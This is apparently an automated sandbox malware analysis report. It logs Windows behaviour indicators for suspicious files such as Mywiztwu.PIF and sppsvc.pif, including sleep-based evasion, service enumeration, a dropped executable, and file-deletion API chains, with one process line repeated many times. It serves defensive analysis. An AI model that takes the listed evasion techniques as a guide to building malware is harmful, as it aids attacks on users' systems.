Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Process information set: FAILCRITICALERRORS \| NOOPENFILEERRORBOX

Malware Analysis System Evasion

Delayed program exit found

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529F7A7 Sleep,ExitProcess,		9_2_1529F7A7
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455F7A7 Sleep,ExitProcess,		24_2_1455F7A7

Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		9_2_152AA748
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,		24_2_1456A748

Source: C:\Users\Public\Libraries\sppsvc.pif	Window / User API: threadDelayed 9388			Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif	Window / User API: foregroundWindowGot 1756			Jump to behavior

Source: C:\Users\Public\Libraries\sppsvc.pif

Decision node followed by non-executed suspicious API: DecisionNode, Non Executed (send or recv or WinExec)

Source: C:\Users\Public\Libraries\sppsvc.pif

Dropped PE file which has not been started: C:\Users\Public\Libraries\easinvoker.exe

Jump to dropped file

Source: C:\Users\Public\Libraries\sppsvc.pif

Evasive API call chain: GetLocalTime,DecisionNodes

Source: C:\Users\Public\alpha.exe	API coverage: 8.4 %
Source: C:\Users\Public\alpha.exe	API coverage: 8.6 %
Source: C:\Users\Public\kn.exe	API coverage: 0.8 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.7 %
Source: C:\Users\Public\alpha.exe	API coverage: 9.7 %
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	API coverage: 6.1 %

Source: C:\Users\Public\Libraries\sppsvc.pif TID: 1744	Thread sleep time: -90000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 5804	Thread sleep time: -537000s >= -30000s	Jump to behavior
Source: C:\Users\Public\Libraries\sppsvc.pif TID: 5804	Thread sleep time: -28164000s >= -30000s	Jump to behavior

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	3_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	3_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	3_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	3_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 3_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	3_2_00007FF683F97B4C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	5_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	5_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	5_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	5_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 5_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	5_2_00007FF683F97B4C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658FC6F8 memset,qsort,#357,FindFirstFileW,GetLastError,bsearch,LocalAlloc,LocalReAlloc,LocalAlloc,FindNextFileW,GetLastError,DeleteFileW,GetLastError,#359,#357,FindClose,LocalFree,LocalFree,	6_2_00007FF6658FC6F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66596234C wcschr,#357,#357,#359,FindFirstFileW,wcsrchr,_wcsnicmp,iswxdigit,wcstoul,FindNextFileW,#359,#359,#357,#357,LocalFree,LocalFree,FindClose,	6_2_00007FF66596234C
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659610C4 #357,FindFirstFileW,LocalFree,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF6659610C4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665963100 #357,FindFirstFileW,#359,FindNextFileW,FindClose,LocalFree,#357,	6_2_00007FF665963100
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665966F80 #359,FindFirstFileW,FindNextFileW,FindClose,LocalAlloc,#357,	6_2_00007FF665966F80
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665943674 #357,LocalAlloc,#357,wcsrchr,FindFirstFileW,GetLastError,#359,lstrcmpW,lstrcmpW,#359,RemoveDirectoryW,GetLastError,#359,#359,FindNextFileW,FindClose,LocalFree,LocalFree,DeleteFileW,GetLastError,#359,	6_2_00007FF665943674
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6658CD440 GetFileAttributesW,#357,#357,#357,FindFirstFileW,LocalFree,#357,FindNextFileW,#357,LocalFree,FindClose,LocalFree,LocalFree,LocalFree,LocalFree,	6_2_00007FF6658CD440
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590D4A4 CreateSemaphoreW,GetLastError,CreateEventW,GetLastError,GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,CloseHandle,CloseHandle,	6_2_00007FF66590D4A4
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590B3D8 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,I_CryptCreateLruCache,GetLastError,I_CryptCreateLruCache,GetLastError,#357,	6_2_00007FF66590B3D8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665905E58 GetLastError,FindFirstFileW,GetLastError,FindNextFileW,GetLastError,GetLastError,#357,FindClose,	6_2_00007FF665905E58
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF665961B04 FindFirstFileW,GetLastError,#357,#359,DeleteFileW,FindNextFileW,FindClose,#359,	6_2_00007FF665961B04
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF6659619F8 #359,FindFirstFileW,FindNextFileW,FindClose,	6_2_00007FF6659619F8
Source: C:\Users\Public\kn.exe	Code function: 6_2_00007FF66590DBC0 FindFirstFileW,GetLastError,CertOpenStore,CertAddStoreToCollection,CertCloseStore,FindNextFileW,GetLastError,GetLastError,#357,GetLastError,GetLastError,#357,LocalFree,CertCloseStore,CertCloseStore,FindClose,	6_2_00007FF66590DBC0
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	9_2_1529BD37
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_15299665 FindFirstFileW,FindNextFileW,FindClose,FindClose,	9_2_15299665
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529783C FindFirstFileW,FindNextFileW,	9_2_1529783C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529880C FindFirstFileW,FindNextFileW,FindClose,	9_2_1529880C
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	9_2_1529BB30
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_1529C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	9_2_1529C34D
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152AC291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	9_2_152AC291
Source: C:\Users\Public\Libraries\sppsvc.pif	Code function: 9_2_152A9AF5 FindFirstFileW,	9_2_152A9AF5
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	10_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	10_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	10_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	10_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 10_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	10_2_00007FF683F97B4C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F82978 FindFirstFileW,FindClose,memmove,_wcsnicmp,_wcsicmp,memmove,	11_2_00007FF683F82978
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F8823C FindFirstFileExW,GetLastError,GetProcessHeap,HeapAlloc,FindNextFileW,GetProcessHeap,HeapReAlloc,FindClose,GetLastError,FindClose,	11_2_00007FF683F8823C
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F71560 memset,FindFirstFileW,FindClose,FindFirstFileW,FindNextFileW,FindClose,??_V@YAXPEAX@Z,GetLastError,SetFileAttributesW,_wcsnicmp,GetFullPathNameW,SetLastError,GetLastError,SetFileAttributesW,	11_2_00007FF683F71560
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F735B8 GetFileAttributesW,GetLastError,FindFirstFileW,GetLastError,FindClose,memset,??_V@YAXPEAX@Z,FindNextFileW,SetLastError,??_V@YAXPEAX@Z,GetLastError,FindClose,	11_2_00007FF683F735B8
Source: C:\Users\Public\alpha.exe	Code function: 11_2_00007FF683F97B4C FindFirstFileW,FindNextFileW,FindClose,	11_2_00007FF683F97B4C
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14559665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_14559665
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_14559253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	24_2_14559253
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1456C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	24_2_1456C291
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	24_2_1455C34D
Source: C:\Users\Public\Libraries\Mywiztwu.PIF	Code function: 24_2_1455BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	24_2_1455BD37
